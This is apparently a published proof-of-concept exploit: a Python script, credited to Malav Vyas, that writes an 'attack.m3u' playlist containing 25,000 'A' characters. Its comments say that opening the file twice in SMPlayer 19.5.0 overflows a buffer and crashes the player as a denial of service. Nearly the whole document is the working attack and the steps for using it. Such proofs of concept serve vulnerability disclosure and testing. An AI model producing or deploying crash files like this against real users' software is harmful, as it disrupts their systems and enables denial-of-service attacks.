#!/usr/bin/python # Title : SMPlayer Denial Of Service Buffer Overflow 19.5.0 32 bit # Tested on : Windows 7 (64 bit) # Vulnerable Software: SMPlayer v 19.5.0 # Exploit Author: Malav Vyas # Twitter : @malav_vyas1 # Vendor Homepage: https://smplayer.info # Version : 19.5.0 # Software Link : https://smplayer.info/en/downloads # POC # run this python file, which will generate attack.m3u file # .m3u file is used as a playlist # this python file will generate a .m3u file with 25000 "A" characters. # Open this file in SMPlayer two times. # second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack. # For more details, please refer to video f="attack.m3u" bof = "A"*25000 writeFile = open(f, "w") writeFile.write(bof) writeFile.close()